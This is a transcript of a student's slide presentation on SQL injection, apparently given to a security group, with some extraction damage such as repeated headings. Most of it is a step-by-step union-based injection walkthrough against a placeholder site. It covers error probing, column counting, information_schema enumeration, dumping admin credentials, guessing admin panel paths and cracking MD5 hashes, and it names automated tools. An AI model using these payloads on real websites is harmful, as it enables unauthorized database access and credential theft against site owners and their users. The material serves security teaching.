$Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...
Transcript of $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...
$Who I am?
Naeemahemad Mansuri
Student of Semester II of Master in Computer Application in
LJMCA
Individual Security Researcher Individual Security Researcher
Contact :
FB -> fb.me/mansurinaeem
G talk -> [email protected]
UNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICS
� F-Secure claims 500,000 sites affected
by SQL injection in 2008
� According to http://www.zone-h.org
defacement statistics are 1 to 5 million defacement statistics are 1 to 5 million
web site
� Over 1.5 million pages affected by the
shadow server with the help of SQL
injection attacks
SQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection Vulnerability
Web Server DBMSWeb Server
DBMS Server
Request
Response
Select * from table name where id=123
http://www.victim.com/site.php?id=123
In the background when we execute or type this url so at that time it’s go to
database and perform query which is written in the application like
Select * from table name where id =123
So After Completion of out Request We Get the Response from the Web
server with database so we get the Result
SQL injection Basic Concept
SQL injection Classification in Web Application
SQL Injection Vulnerability
Blind Injection
Simple Blind SQL Injection Double Blind SQL Injection
SQL Injection
Method to Detect the SQL Injection
• Fuzzing
• Function Testing
• Analysis of Source Code
Example to Checking the web site is vulnerable or not
http://www.victim.com/site.php?id=123 ‘ (single Quote)
http://www.victim.com/site.php?id=123 ‘’ (double Quote)
http://www.victim.com/site.php?id=123 ‘-- (SQ minus minus)
http://www.victim.com/site.php?id=123 ‘/*
http://www.victim.com/site.php?id=123 ‘#
Error in SQL injection
Error Message You get when you perform SQL injection on the Web Application
Finding the Number of Columns
Ok now lets go ahead after Find the SQL Vulnerable Web site now we find the
Number of column in Database for that order by query is use
http://www.victim.com/site.php?id=123 order by 1 (No Error)
http://www.victim.com/site.php?id=123 order by 2 (No Error)
http://www.victim.com/site.php?id=123 order by 3 (No Error)
http://www.victim.com/site.php?id=123 order by 4 (No Error)
http://www.victim.com/site.php?id=123 order by 5 (No Error)
http://www.victim.com/site.php?id=123 order by 6 (No Error)
http://www.victim.com/site.php?id=123 order by 7 (Error)
If the above query not work then add --,--+,--+-
Finding the Vulnerable ColumnsAfter find the number of column in database we have to find the number of
Vulnerable Columns or Vulnerable Column for that we use union select or
Union select all command and we have to put – sign before id
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,2,3,4,5,6 - -
It’s Look Like
Finding the version, user, database
nameAfter finding the vulnerable Column in the database we have to find the user
Name of database, database name, version which is used in the web site.
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,user(),3,4,5,6 --
http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --
http://www.victim.com/site.php?id=-123 union select 1,version(),3,4,5,6 --
Finding the Tables Name in the DB
After finding the version user and database we have to find the number of tables
In the database. In the vulnerable column we have write concat(table_name)
Or group_concat(table_name) and at the end we have to write
from information_schema.tables where table_schema=database()--
• Syntax• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(table_name),
3,4,5,6 from information_schema.tables where table_schema=database()--
This Query is Display all the table name.
Finding the columName of Table
After finding the Names of tables we have to find the Columns names
In that Table for that we have write concat(column_name)
Or group_concat(column_name) and at the end we have to write
from information_schema.columns where table_name=char()()--
• Syntax• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(column_name),
3,4,5,6 from information_schema.column where table_name=char()()--
* We have to convert the table name in the mysqlchar()
This Query is Display all the column name of the table.
Extract the Data
Now we have to Extract the data so when we have perform the column query
So after that we have to extract or dump the data.
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,
column2),
3,4,5,6 from admin--
* If admin not work then convert the table name in the mysqlchar()
This Query is Display all the data DUMP data.
Login voilaAfter dump the data we have to find the admin panel of the web site
And after so for that you have to do
http://www.victim.com/admin/
http://www.victim.com/adminlogin/
http://www.victim.com/controlpanel/
http://www.victim.com/administrator/
http://www.victim.com/manager/
http://www.victim.com/superuser/
We have try guess and you got the admin panel.
If at the time of dump data if you not get the password in the text mode so
You have to decrypt it with this web site -> www.md5decrypter.co.uk/
Automated Exploitation of SQL injection
• SQLMAP (sqlmap.sourceforge.net or sqlmap.org )
Full Support : Mysql, MSsql, Oracle, Postgresql
• SQLUS (sqlsus.sourceforge.net)
Partial Support : Only Mysql Support
• HAVIJ
(http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/)
Full Support : if you Purchase it :P
Partial Support : is also Available
You can develop your own Script and tools to Exploit if the web site is
Vulnerable to SQL Injection it is up to you.
Material of SQL injection & Reference
• http://www.php.net/manual/en/security.database.sql-
injection.php
•https://www.owasp.org/index.php/SQL_Injection
•SQL Injection Attacks and Defense - Syngress publication•SQL Injection Attacks and Defense - Syngress publication
-Justin Claarke
•http://www.Pentestmonkey.net Cheat Sheets:
(Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2,
Informix)